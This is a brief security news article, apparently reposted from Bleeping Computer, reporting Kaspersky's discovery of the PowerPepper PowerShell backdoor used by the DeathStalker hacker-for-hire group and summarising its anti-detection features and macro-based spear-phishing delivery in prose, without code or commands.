skip to Main Content

Cybercrime, DeathStalker has developed a new Windows backdoor

Bleeping Computer: Kaspersky discovered the PowerShell-based PowerPepper malware. The backdoor is constantly evolving

DeathStalker has developed a new Windows backdoor. It has been denounced by Bleeping Computer cybersecurity experts. Kaspersky discovered a previously undocumented Windows PowerShell malware dubbed PowerPepper and developed by the hacker-for-hire cybercrime group, as Bleeping Computer reports. Since its discovery, the malware has been under constant development with new versions being deployed and its delivery chains being adapted to new targets. The new payload is an in-memory Windows PowerShell-based backdoor that allows its operators to execute shell commands delivered remotely via a command-and-control (C2) server. Its capabilities include several anti-detection tactics such as “mouse movements detection, client’s MAC addresses filtering, Excel application handling, and antivirus products inventory.”

The cybersecurity experts: The implant expoits new obfuscation, execution, and masquerading tricks

According the cybersecurity experts, the malware is delivered onto targets’ computers in the form of spear-phishing email malicious attachments or links that point to documents containing malicious Visual Basic for Application (VBA) macros that execute PowerPepper and gain persistence on infected systems. “This infection chain varied slightly between July and November 2020: some dropped file names, integrated code or remote links changed, but the logic stayed the same,” Kaspersky Lab researcher Pierre Delcher explained. Its macro-based and LNK-based delivery chains also have DeathStalker’s fingerprints on them with multiple obfuscation, execution, and masquerading tricks being employed to evade detection. The cybercrime group (aka Deceptikons) is a threat actor whose activity goes back to at least 2012, known for using a wide range of malware strains and complex delivery chains, as well as regularly using tactics that help them evade detection.

Back To Top